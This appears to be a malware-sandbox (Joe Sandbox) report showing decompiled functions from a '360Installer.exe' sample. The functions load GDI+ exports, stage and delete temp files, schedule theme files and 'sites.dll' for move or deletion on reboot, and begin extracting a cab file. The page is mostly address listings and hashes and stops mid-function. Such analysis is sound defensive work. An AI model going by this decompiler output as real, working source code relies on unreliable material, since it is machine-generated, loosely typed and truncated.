                                                                                                                                                                                          0x00c8fe9a
                                                                                                                                                                                          0x00c8fea2
                                                                                                                                                                                          0x00c8feaa
                                                                                                                                                                                          0x00c8fea4
                                                                                                                                                                                          0x00c8fea6
                                                                                                                                                                                          0x00c8fea6
                                                                                                                                                                                          0x00c8feae
                                                                                                                                                                                          0x00c8feb6
                                                                                                                                                                                          0x00c8feb0
                                                                                                                                                                                          0x00c8feb2
                                                                                                                                                                                          0x00c8feb2
                                                                                                                                                                                          0x00c8feba
                                                                                                                                                                                          0x00c8fec3
                                                                                                                                                                                          0x00c8febc
                                                                                                                                                                                          0x00c8fec0
                                                                                                                                                                                          0x00c8fec0

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: b03391427c2d49d620b032b4b97c2133b9dac3168cd928bd5fe3eec2240883cf
                                                                                                                                                                                          • Instruction ID: 395d7baa055fd2cdfbeb09b508c448d19e26ba860801e09d67bee271d2ceeb33
                                                                                                                                                                                          • Opcode Fuzzy Hash: b03391427c2d49d620b032b4b97c2133b9dac3168cd928bd5fe3eec2240883cf
                                                                                                                                                                                          • Instruction Fuzzy Hash: 84F06727186F0CE08F25605500246E553408A2FB9C7E4507DCCDF513F685C9BE0BF25D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CE36E6 Relevance: 79.0, APIs: 1, Strings: 44, Instructions: 237libraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00CE36E6(struct HINSTANCE__** __ecx) {
				struct HINSTANCE__* _t46;
				struct HINSTANCE__** _t136;

				_t136 = __ecx;
				_t46 = LoadLibraryW(L"Gdiplus.dll");
				 *_t136 = _t46;
				if(_t46 != 0) {
					_t1 =  &(_t136[1]); // 0x4
					E00CE33C9(_t46, "GdiplusStartup", _t1);
					_t2 =  &(_t136[2]); // 0x8
					E00CE33DE( *_t136, "GdiplusShutdown", _t2);
					_t3 =  &(_t136[3]); // 0xc
					E00CE33F3( *_t136, "GdipCreateFromHDC", _t3);
					_t4 =  &(_t136[4]); // 0x10
					E00CE3408( *_t136, "GdipDeleteGraphics", _t4);
					_t5 =  &(_t136[5]); // 0x14
					E00CE341D( *_t136, "GdipCreateSolidFill", _t5);
					_t6 =  &(_t136[6]); // 0x18
					E00CE3432( *_t136, "GdipDeleteBrush", _t6);
					_t7 =  &(_t136[7]); // 0x1c
					E00CE3447( *_t136, "GdipCloneBrush", _t7);
					_t8 =  &(_t136[8]); // 0x20
					E00CE345C( *_t136, "GdipAlloc", _t8);
					_t9 =  &(_t136[9]); // 0x24
					E00CE3471( *_t136, "GdipFree", _t9);
					_t10 =  &(_t136[0xa]); // 0x28
					E00CE3486( *_t136, "GdipFillRectangleI", _t10);
					_t11 =  &(_t136[0xb]); // 0x2c
					E00CE349B( *_t136, "GdipLoadImageFromFile", _t11);
					_t12 =  &(_t136[0xc]); // 0x30
					E00CE349B( *_t136, "GdipLoadImageFromFileICM", _t12);
					_t13 =  &(_t136[0xd]); // 0x34
					E00CE34B0( *_t136, "GdipDisposeImage", _t13);
					_t14 =  &(_t136[0xe]); // 0x38
					E00CE34C5( *_t136, "GdipCloneImage", _t14);
					_t15 =  &(_t136[0xf]); // 0x3c
					E00CE34DA( *_t136, "GdipGetImageWidth", _t15);
					_t16 =  &(_t136[0x10]); // 0x40
					E00CE34DA( *_t136, "GdipGetImageHeight", _t16);
					_t17 =  &(_t136[0x11]); // 0x44
					E00CE34EF( *_t136, "GdipDrawImageI", _t17);
					_t18 =  &(_t136[0x12]); // 0x48
					E00CE3504( *_t136, "GdipDrawImagePointRectI", _t18);
					_t19 =  &(_t136[0x13]); // 0x4c
					E00CE3519( *_t136, "GdipDrawImageRectRectI", _t19);
					_t20 =  &(_t136[0x14]); // 0x50
					E00CE352E( *_t136, "GdipLoadImageFromStream", _t20);
					_t21 =  &(_t136[0x15]); // 0x54
					E00CE352E( *_t136, "GdipLoadImageFromStreamICM", _t21);
					_t22 =  &(_t136[0x16]); // 0x58
					E00CE3543( *_t136, "GdipCreateBitmapFromStream", _t22);
					_t23 =  &(_t136[0x17]); // 0x5c
					E00CE3543( *_t136, "GdipCreateBitmapFromStreamICM", _t23);
					_t24 =  &(_t136[0x18]); // 0x60
					E00CE3558( *_t136, "GdipDeleteFont", _t24);
					_t25 =  &(_t136[0x19]); // 0x64
					E00CE356D( *_t136, "GdipDeleteFontFamily", _t25);
					_t26 =  &(_t136[0x1a]); // 0x68
					E00CE3582( *_t136, "GdipDeleteStringFormat", _t26);
					_t27 =  &(_t136[0x1b]); // 0x6c
					E00CE3597( *_t136, "GdipDrawString", _t27);
					_t28 =  &(_t136[0x1c]); // 0x70
					E00CE35AC( *_t136, "GdipSetStringFormatFlags", _t28);
					_t29 =  &(_t136[0x1d]); // 0x74
					E00CE35C1( *_t136, "GdipSetStringFormatAlign", _t29);
					_t30 =  &(_t136[0x1e]); // 0x78
					E00CE35C1( *_t136, "GdipSetStringFormatLineAlign", _t30);
					_t31 =  &(_t136[0x1f]); // 0x7c
					E00CE35D6( *_t136, "GdipCreateStringFormat", _t31);
					_t32 =  &(_t136[0x20]); // 0x80
					E00CE35EB( *_t136, "GdipCreateFont", _t32);
					_t33 =  &(_t136[0x21]); // 0x84
					E00CE3600( *_t136, "GdipCreateFontFamilyFromName", _t33);
					_t34 =  &(_t136[0x22]); // 0x88
					E00CE3615( *_t136, "GdipMeasureString", _t34);
					_t35 =  &(_t136[0x23]); // 0x8c
					E00CE362A( *_t136, "GdipDisposeImageAttributes", _t35);
					_t36 =  &(_t136[0x24]); // 0x90
					E00CE363F( *_t136, "GdipSetImageAttributesColorMatrix", _t36);
					_t37 =  &(_t136[0x25]); // 0x94
					E00CE3654( *_t136, "GdipCreateImageAttributes", _t37);
					_t38 =  &(_t136[0x26]); // 0x98
					E00CE3669( *_t136, "GdipCreateBitmapFromFile", _t38);
					_t39 =  &(_t136[0x27]); // 0x9c
					E00CE3669( *_t136, "GdipCreateBitmapFromFileICM", _t39);
					_t40 =  &(_t136[0x28]); // 0xa0
					E00CE367E( *_t136, "GdipRotateWorldTransform", _t40);
					_t41 =  &(_t136[0x29]); // 0xa4
					E00CE3693( *_t136, "GdipTranslateWorldTransform", _t41);
					_t42 =  &(_t136[0x2a]); // 0xa8
					E00CE36A8( *_t136, "GdipDrawImageRectRect", _t42);
					_t43 =  &(_t136[0x2b]); // 0xac
					E00CE36BD( *_t136, "GdipCreateBitmapFromHBITMAP", _t43);
					return 0 |  *_t136 != 0x00000000;
				} else {
					return _t46;
				}
			}





                                                                                                                                                                                          0x00ce36ec
                                                                                                                                                                                          0x00ce36ee
                                                                                                                                                                                          0x00ce36f4
                                                                                                                                                                                          0x00ce36f8
                                                                                                                                                                                          0x00ce36fc
                                                                                                                                                                                          0x00ce3706
                                                                                                                                                                                          0x00ce370b
                                                                                                                                                                                          0x00ce3716
                                                                                                                                                                                          0x00ce371b
                                                                                                                                                                                          0x00ce3726
                                                                                                                                                                                          0x00ce372b
                                                                                                                                                                                          0x00ce3736
                                                                                                                                                                                          0x00ce373b
                                                                                                                                                                                          0x00ce3746
                                                                                                                                                                                          0x00ce374b
                                                                                                                                                                                          0x00ce3756
                                                                                                                                                                                          0x00ce375e
                                                                                                                                                                                          0x00ce3769
                                                                                                                                                                                          0x00ce376e
                                                                                                                                                                                          0x00ce3779
                                                                                                                                                                                          0x00ce377e
                                                                                                                                                                                          0x00ce3789
                                                                                                                                                                                          0x00ce378e
                                                                                                                                                                                          0x00ce3799
                                                                                                                                                                                          0x00ce379e
                                                                                                                                                                                          0x00ce37a9
                                                                                                                                                                                          0x00ce37ae
                                                                                                                                                                                          0x00ce37b9
                                                                                                                                                                                          0x00ce37c1
                                                                                                                                                                                          0x00ce37cc
                                                                                                                                                                                          0x00ce37d1
                                                                                                                                                                                          0x00ce37dc
                                                                                                                                                                                          0x00ce37e1
                                                                                                                                                                                          0x00ce37ec
                                                                                                                                                                                          0x00ce37f1
                                                                                                                                                                                          0x00ce37fc
                                                                                                                                                                                          0x00ce3801
                                                                                                                                                                                          0x00ce380c
                                                                                                                                                                                          0x00ce3811
                                                                                                                                                                                          0x00ce381c
                                                                                                                                                                                          0x00ce3824
                                                                                                                                                                                          0x00ce382f
                                                                                                                                                                                          0x00ce3834
                                                                                                                                                                                          0x00ce383f
                                                                                                                                                                                          0x00ce3844
                                                                                                                                                                                          0x00ce384f
                                                                                                                                                                                          0x00ce3854
                                                                                                                                                                                          0x00ce385f
                                                                                                                                                                                          0x00ce3864
                                                                                                                                                                                          0x00ce386f
                                                                                                                                                                                          0x00ce3874
                                                                                                                                                                                          0x00ce387f
                                                                                                                                                                                          0x00ce3887
                                                                                                                                                                                          0x00ce3892
                                                                                                                                                                                          0x00ce3897
                                                                                                                                                                                          0x00ce38a2
                                                                                                                                                                                          0x00ce38a7
                                                                                                                                                                                          0x00ce38b2
                                                                                                                                                                                          0x00ce38b7
                                                                                                                                                                                          0x00ce38c2
                                                                                                                                                                                          0x00ce38c7
                                                                                                                                                                                          0x00ce38d2
                                                                                                                                                                                          0x00ce38d7
                                                                                                                                                                                          0x00ce38e2
                                                                                                                                                                                          0x00ce38ea
                                                                                                                                                                                          0x00ce38f5
                                                                                                                                                                                          0x00ce38fa
                                                                                                                                                                                          0x00ce3908
                                                                                                                                                                                          0x00ce390d
                                                                                                                                                                                          0x00ce391b
                                                                                                                                                                                          0x00ce3920
                                                                                                                                                                                          0x00ce392e
                                                                                                                                                                                          0x00ce3933
                                                                                                                                                                                          0x00ce3941
                                                                                                                                                                                          0x00ce3946
                                                                                                                                                                                          0x00ce3954
                                                                                                                                                                                          0x00ce395c
                                                                                                                                                                                          0x00ce396a
                                                                                                                                                                                          0x00ce396f
                                                                                                                                                                                          0x00ce397d
                                                                                                                                                                                          0x00ce3982
                                                                                                                                                                                          0x00ce3990
                                                                                                                                                                                          0x00ce3995
                                                                                                                                                                                          0x00ce39a3
                                                                                                                                                                                          0x00ce39a8
                                                                                                                                                                                          0x00ce39b6
                                                                                                                                                                                          0x00ce39bb
                                                                                                                                                                                          0x00ce39c9
                                                                                                                                                                                          0x00ce39d1
                                                                                                                                                                                          0x00ce39df
                                                                                                                                                                                          0x00ce39ef
                                                                                                                                                                                          0x00ce36fb
                                                                                                                                                                                          0x00ce36fb
                                                                                                                                                                                          0x00ce36fb

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryW.KERNEL32(Gdiplus.dll,00000000,00C9BCFE,Q360InstallerMainWnd,360Installer.exe,?), ref: 00CE36EE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                          • String ID: GdipAlloc$GdipCloneBrush$GdipCloneImage$GdipCreateBitmapFromFile$GdipCreateBitmapFromFileICM$GdipCreateBitmapFromHBITMAP$GdipCreateBitmapFromStream$GdipCreateBitmapFromStreamICM$GdipCreateFont$GdipCreateFontFamilyFromName$GdipCreateFromHDC$GdipCreateImageAttributes$GdipCreateSolidFill$GdipCreateStringFormat$GdipDeleteBrush$GdipDeleteFont$GdipDeleteFontFamily$GdipDeleteGraphics$GdipDeleteStringFormat$GdipDisposeImage$GdipDisposeImageAttributes$GdipDrawImageI$GdipDrawImagePointRectI$GdipDrawImageRectRect$GdipDrawImageRectRectI$GdipDrawString$GdipFillRectangleI$GdipFree$GdipGetImageHeight$GdipGetImageWidth$GdipLoadImageFromFile$GdipLoadImageFromFileICM$GdipLoadImageFromStream$GdipLoadImageFromStreamICM$GdipMeasureString$GdipRotateWorldTransform$GdipSetImageAttributesColorMatrix$GdipSetStringFormatAlign$GdipSetStringFormatFlags$GdipSetStringFormatLineAlign$GdipTranslateWorldTransform$Gdiplus.dll$GdiplusShutdown$GdiplusStartup
                                                                                                                                                                                          • API String ID: 1029625771-2635160007
                                                                                                                                                                                          • Opcode ID: 20d20e8075cf1bf245082070e2ff02af71d72676152912442f8f6938cf377bba
                                                                                                                                                                                          • Instruction ID: 1a3c6ce348dfcc2e0aec642dcde66c51edd4c300ccca05a5f10f076c75e1340f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 20d20e8075cf1bf245082070e2ff02af71d72676152912442f8f6938cf377bba
                                                                                                                                                                                          • Instruction Fuzzy Hash: E5814F79180784FFE721EF61CC47DA6BBEDFF047807500829F5D192165E762BA58AB20
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CEF4D0 Relevance: 38.7, APIs: 15, Strings: 7, Instructions: 199fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 61%
                                                                                                                                                                                          			E00CEF4D0(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t48;
				short _t49;
				WCHAR* _t57;
				int _t67;
				int _t69;
				WCHAR* _t70;
				WCHAR* _t72;
				int _t78;
				WCHAR** _t85;
				void* _t110;
				short _t111;
				void* _t112;
				long _t113;
				void* _t135;
				void* _t136;
				WCHAR* _t137;
				void* _t138;
				void* _t140;
				int _t142;
				void* _t143;
				WCHAR* _t145;
				void* _t147;

				_t135 = __edx;
				_t114 = __ecx;
				_t145 = _t147 - 0x1104;
				E00D00E90(0x1104);
				_t48 =  *0xd64070; // 0x8a9e1774
				_t49 = _t48 ^ _t145;
				_t145[0x880] = _t49;
				 *[fs:0x0] = _t145 - 0xc;
				_t111 = _t145[0x886];
				_t137 = 0;
				 *((intOrPtr*)(_t145 - 0x14)) = __ecx;
				E00D006A0(0,  &(_t145[0x400]), 0, 0x800);
				E00D006A0(0, _t145, 0, 0x800);
				E00D006A0(0,  &(_t145[0x800]), 0, 0x100);
				_t57 = _t145;
				__imp__SHGetSpecialFolderPathW(0, _t57, 0x1a, 0, _t49, _t136, _t140, _t110, __ecx, __ecx,  *[fs:0x0], 0xd37eb0, 0xffffffff);
				if(_t57 != 0) {
					_t142 = 0;
					__eflags = 0;
					while(1) {
						_push(0x80);
						_push( &(_t145[0x800]));
						E00CC1003(_t111, _t114, _t135, _t137);
						PathCombineW( &(_t145[0x400]), _t145,  &(_t145[0x800]));
						E00D00ED5( &(_t145[0x400]), L".tmp");
						_pop(_t114);
						_t67 = PathFileExistsW( &(_t145[0x400]));
						__eflags = _t67;
						if(_t67 == 0) {
							break;
						}
						_t142 = _t142 + 1;
						__eflags = _t142 - 0xa;
						if(_t142 < 0xa) {
							continue;
						}
						break;
					}
					_t69 = E00CEEF14( *((intOrPtr*)(_t145 - 0x14)),  &(_t145[0x400]));
					__eflags = _t69;
					if(_t69 == 0) {
						goto L1;
					}
					_t72 =  *0xd5d01c; // 0xd5d014
					 *(_t145 - 0x10) = _t72;
					 *(_t145 - 4) = _t137;
					E00C9ACCC(_t145 - 0x10, _t145);
					E00C9CA59(_t145 - 0x10, L"\\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp");
					E00CEF1C5(_t111,  *((intOrPtr*)(_t145 - 0x14)), _t135, _t137, _t142, __eflags);
					__imp__#165(_t137,  *(_t145 - 0x10),  *(_t145 - 0x10));
					_t78 = L00CEF021( &(_t145[0x400]),  *(_t145 - 0x10));
					__eflags = _t78;
					if(_t78 != 0) {
						E00C9CCC5(_t111, _t145, _t145 - 0x10);
						DeleteFileW( &(_t145[0x400]));
						_push(L"\\themes\\NewInstallAir\\NewInstallAir.ui");
						_push(_t145 - 0x10);
						_push(_t145 - 0x14);
						_t85 = E00C9B7F5(_t111, _t135, _t137, _t142, __eflags);
						_t144 = MoveFileExW;
						_t113 = 4;
						MoveFileExW( *_t85, _t137, _t113);
						E00C9820F(_t145 - 0x14);
						_push(L"\\themes\\theme_NewInstallAir.xml");
						_push(_t145 - 0x10);
						_push(_t145 - 0x14);
						MoveFileExW( *(E00C9B7F5(_t113, _t135, _t137, MoveFileExW, __eflags)), _t137, _t113);
						E00C9820F(_t145 - 0x14);
						_push(L"\\themes\\NewInstallAir");
						_push(_t145 - 0x10);
						_push(_t145 - 0x14);
						MoveFileExW( *(E00C9B7F5(_t113, _t135, _t137, MoveFileExW, __eflags)), _t137, _t113);
						E00C9820F(_t145 - 0x14);
						_push(L"\\themes");
						_push(_t145 - 0x10);
						_push(_t145 - 0x14);
						MoveFileExW( *(E00C9B7F5(_t113, _t135, _t137, MoveFileExW, __eflags)), _t137, _t113);
						E00C9820F(_t145 - 0x14);
						_push(L"\\sites.dll");
						_push(_t145 - 0x10);
						_push(_t145 - 0x14);
						MoveFileExW( *(E00C9B7F5(_t113, _t135, _t137, _t144, __eflags)), _t137, _t113);
						E00C9820F(_t145 - 0x14);
						MoveFileExW( *(_t145 - 0x10), _t137, _t113);
						_t137 = 1;
					}
					E00C9820F(_t145 - 0x10);
					_t70 = _t137;
					L2:
					 *[fs:0x0] =  *((intOrPtr*)(_t145 - 0xc));
					_pop(_t138);
					_pop(_t143);
					_pop(_t112);
					return E00D0071A(_t70, _t112, _t145[0x880] ^ _t145, _t135, _t138, _t143);
				}
				L1:
				_t70 = 0;
				goto L2;
			}





























                                                                                                                                                                                          0x00cef4d0
                                                                                                                                                                                          0x00cef4d0
                                                                                                                                                                                          0x00cef4d1
                                                                                                                                                                                          0x00cef4dd
                                                                                                                                                                                          0x00cef4f2
                                                                                                                                                                                          0x00cef4f7
                                                                                                                                                                                          0x00cef4f9
                                                                                                                                                                                          0x00cef506
                                                                                                                                                                                          0x00cef50c
                                                                                                                                                                                          0x00cef518
                                                                                                                                                                                          0x00cef522
                                                                                                                                                                                          0x00cef525
                                                                                                                                                                                          0x00cef530
                                                                                                                                                                                          0x00cef542
                                                                                                                                                                                          0x00cef54d
                                                                                                                                                                                          0x00cef552
                                                                                                                                                                                          0x00cef55a
                                                                                                                                                                                          0x00cef583
                                                                                                                                                                                          0x00cef583
                                                                                                                                                                                          0x00cef585
                                                                                                                                                                                          0x00cef58b
                                                                                                                                                                                          0x00cef590
                                                                                                                                                                                          0x00cef591
                                                                                                                                                                                          0x00cef5aa
                                                                                                                                                                                          0x00cef5bc
                                                                                                                                                                                          0x00cef5c2
                                                                                                                                                                                          0x00cef5ca
                                                                                                                                                                                          0x00cef5d0
                                                                                                                                                                                          0x00cef5d2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cef5d4
                                                                                                                                                                                          0x00cef5d5
                                                                                                                                                                                          0x00cef5d8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cef5d8
                                                                                                                                                                                          0x00cef5e4
                                                                                                                                                                                          0x00cef5e9
                                                                                                                                                                                          0x00cef5eb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cef5f1
                                                                                                                                                                                          0x00cef5f6
                                                                                                                                                                                          0x00cef600
                                                                                                                                                                                          0x00cef603
                                                                                                                                                                                          0x00cef610
                                                                                                                                                                                          0x00cef61b
                                                                                                                                                                                          0x00cef624
                                                                                                                                                                                          0x00cef634
                                                                                                                                                                                          0x00cef63b
                                                                                                                                                                                          0x00cef63d
                                                                                                                                                                                          0x00cef654
                                                                                                                                                                                          0x00cef660
                                                                                                                                                                                          0x00cef666
                                                                                                                                                                                          0x00cef66e
                                                                                                                                                                                          0x00cef672
                                                                                                                                                                                          0x00cef673
                                                                                                                                                                                          0x00cef678
                                                                                                                                                                                          0x00cef680
                                                                                                                                                                                          0x00cef685
                                                                                                                                                                                          0x00cef68a
                                                                                                                                                                                          0x00cef68f
                                                                                                                                                                                          0x00cef697
                                                                                                                                                                                          0x00cef69b
                                                                                                                                                                                          0x00cef6a5
                                                                                                                                                                                          0x00cef6aa
                                                                                                                                                                                          0x00cef6af
                                                                                                                                                                                          0x00cef6b7
                                                                                                                                                                                          0x00cef6bb
                                                                                                                                                                                          0x00cef6c5
                                                                                                                                                                                          0x00cef6ca
                                                                                                                                                                                          0x00cef6cf
                                                                                                                                                                                          0x00cef6d7
                                                                                                                                                                                          0x00cef6db
                                                                                                                                                                                          0x00cef6e5
                                                                                                                                                                                          0x00cef6ea
                                                                                                                                                                                          0x00cef6ef
                                                                                                                                                                                          0x00cef6f7
                                                                                                                                                                                          0x00cef6fb
                                                                                                                                                                                          0x00cef705
                                                                                                                                                                                          0x00cef70a
                                                                                                                                                                                          0x00cef714
                                                                                                                                                                                          0x00cef718
                                                                                                                                                                                          0x00cef718
                                                                                                                                                                                          0x00cef642
                                                                                                                                                                                          0x00cef647
                                                                                                                                                                                          0x00cef55e
                                                                                                                                                                                          0x00cef561
                                                                                                                                                                                          0x00cef569
                                                                                                                                                                                          0x00cef56a
                                                                                                                                                                                          0x00cef56b
                                                                                                                                                                                          0x00cef580
                                                                                                                                                                                          0x00cef580
                                                                                                                                                                                          0x00cef55c
                                                                                                                                                                                          0x00cef55c
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CEF525
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CEF530
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CEF542
                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00CEF552
                                                                                                                                                                                          • PathCombineW.SHLWAPI(?,?,?), ref: 00CEF5AA
                                                                                                                                                                                          • _wcscat.LIBCMT ref: 00CEF5BC
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?), ref: 00CEF5CA
                                                                                                                                                                                          • SHCreateDirectory.SHELL32(00000000,?,?,\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp,?), ref: 00CEF624
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?), ref: 00CEF660
                                                                                                                                                                                            • Part of subcall function 00C9B7F5: __EH_prolog3.LIBCMT ref: 00C9B7FC
                                                                                                                                                                                            • Part of subcall function 00C9B7F5: lstrlenW.KERNEL32(00000001,?,?,?,?,00000004), ref: 00C9B823
                                                                                                                                                                                          • MoveFileExW.KERNEL32(00000000,00000000,00000004), ref: 00CEF685
                                                                                                                                                                                            • Part of subcall function 00C9820F: InterlockedDecrement.KERNEL32 ref: 00C98223
                                                                                                                                                                                          • MoveFileExW.KERNEL32(00000000,00000000,00000004), ref: 00CEF6A5
                                                                                                                                                                                          • MoveFileExW.KERNEL32(00000000,00000000,00000004), ref: 00CEF6C5
                                                                                                                                                                                          • MoveFileExW.KERNEL32(00000000,00000000,00000004), ref: 00CEF6E5
                                                                                                                                                                                          • MoveFileExW.KERNEL32(00000000,00000000,00000004), ref: 00CEF705
                                                                                                                                                                                          • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00CEF714
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Move$Path_memset$CombineCreateDecrementDeleteDirectoryExistsFolderH_prolog3InterlockedSpecial_wcscatlstrlen
                                                                                                                                                                                          • String ID: .tmp$\sites.dll$\themes$\themes\NewInstallAir$\themes\NewInstallAir\NewInstallAir.ui$\themes\theme_NewInstallAir.xml$\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp
                                                                                                                                                                                          • API String ID: 2565526088-447083578
                                                                                                                                                                                          • Opcode ID: 6da6bb6ec80a3c0354203021eb38407a10dfdfc873c736248f19148312d6b43c
                                                                                                                                                                                          • Instruction ID: fbcf2848e15fccd6bd8ec76637ea0662d03423f1ce89f7c08bb78a3a815aef13
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6da6bb6ec80a3c0354203021eb38407a10dfdfc873c736248f19148312d6b43c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1961F97290015DAEDB15EFA1DC89EEF77BCFB49700F00042AB515E6191EE74AA08DB71
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8B0A0 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 276filesleeplibraryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 55%
                                                                                                                                                                                          			E00C8B0A0(WCHAR* __ebx) {
				short* _t88;
				short* _t93;
				WCHAR* _t94;
				struct HINSTANCE__* _t97;
				short* _t103;
				short* _t107;
				signed int _t122;
				signed int _t132;
				void* _t136;
				char* _t137;
				intOrPtr _t174;
				void* _t175;
				int _t177;
				void* _t181;
				struct HINSTANCE__* _t182;
				short* _t185;
				signed int _t186;
				void* _t188;
				short* _t189;
				short* _t193;

				_t135 = __ebx;
				_t189 = _t188 + 4;
				GetTempPathW(0x104, _t186 - 0x218);
				PathAppendW(_t186 - 0x218, L"360ini.cab");
				_t140 =  *(_t186 - 0xa64) -  *(_t186 - 0xa68);
				_t164 = (0x92492493 * ( *(_t186 - 0xa64) -  *(_t186 - 0xa68)) >> 0x20) + _t140 >> 4;
